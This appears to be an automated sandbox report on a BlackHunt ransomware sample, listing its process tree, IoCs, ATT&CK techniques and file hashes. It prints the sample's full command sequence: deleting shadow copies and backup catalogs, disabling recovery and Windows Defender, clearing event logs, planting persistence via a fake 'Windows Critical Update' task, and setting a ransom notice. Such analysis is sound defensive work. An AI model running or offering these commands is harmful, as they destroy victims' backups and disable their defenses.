cmd.exe 124 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe"C:\Users\Admin\AppData\Local\Temp\7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1656 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2556
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2204
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:868
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1052
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2844
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1416
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:796
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1144
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe" /F2⤵PID:1996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2104
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2892
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2720
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe"2⤵
- Deletes itself
PID:856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:3444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3820
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3328
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2244
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3764
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:4028
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3800
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:1420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:1408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1404
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2956
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7b774fa3822192cf2fa3e84013e51b77756cf558bb5441db1922bca35d418d4b.exe" /F1⤵
- Creates scheduled task(s)
PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:1708
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2280
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2728
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:3020
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2552
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:2308
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2084
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2276
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1572
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2880
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:1824
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2272
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1292
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:1360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2156
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:1504
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2572
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2548
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2115838639-1243578541992860435-8053835-1789000198-2004561933600775274-1848025228"1⤵PID:2736
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1896
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2764
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:1548
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3464
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:2280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3108
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:1712
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:3180
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"1⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3616
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:3436
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:1616
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1236
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:3608
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:3508
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:3408
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "779348063-2082863857-468344106156140975941794509115559815651238579793-941937221"1⤵PID:2844
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-702663284759059183777562928-2027087397-1828393748881319432-1140467205-343369616"1⤵PID:1144
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:1472
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:3932
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:2956
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD5a831c3d775f7830698052dc701bce485
SHA1ddd3a10cb982020ec8cd1ff1445c1c00778d31d2
SHA256783c85efa803dc072896dcf13e84bcc0c87628e4fd6f5789ac67b4a24064e35e
SHA512f707220cd97ec75f4abd7f255f0ad61e63471a7db064f3bd2496224b6d20496a05d70ed63e99f4c8ad12376a7b64dfd0be36ea2e81de309fa59739abd25bb369
-
Filesize
1KB
MD50ef1d3dee379dda89ec5f55d88d476a3
SHA1adcf97bd55fd41b4b5fde66b2bef60e1c5a17daf
SHA25661154eb7de858f38a8d189eefa348046cac6502dd008e50b66d201c1390027ce
SHA51210d9000a5da7a8fbc6c8ea5a44bfa01882736d45462f08ab5093250dd9845fb20e62fcce7a19a09789ac1a797dfd555c777c32d50792a64dc5fd79613716066e
-
Filesize
12KB
MD56b95ebb24defef67c3d550c4e3c688c5
SHA14d1ae0088fa6dd45fe7601b8c644db8c6b4f6688
SHA256d6d50dc1e88c89c59513ce31263a819e47eaa29bf6512c01d83ea581c1e8033f
SHA5121cd4ddfec6ab1ac1784a1043406f47ba5aa9f6398ada19d08a1162caad0a91fd7b862c122049b267f20062e831054f849b5ad41c596a044710183fcb3721c45e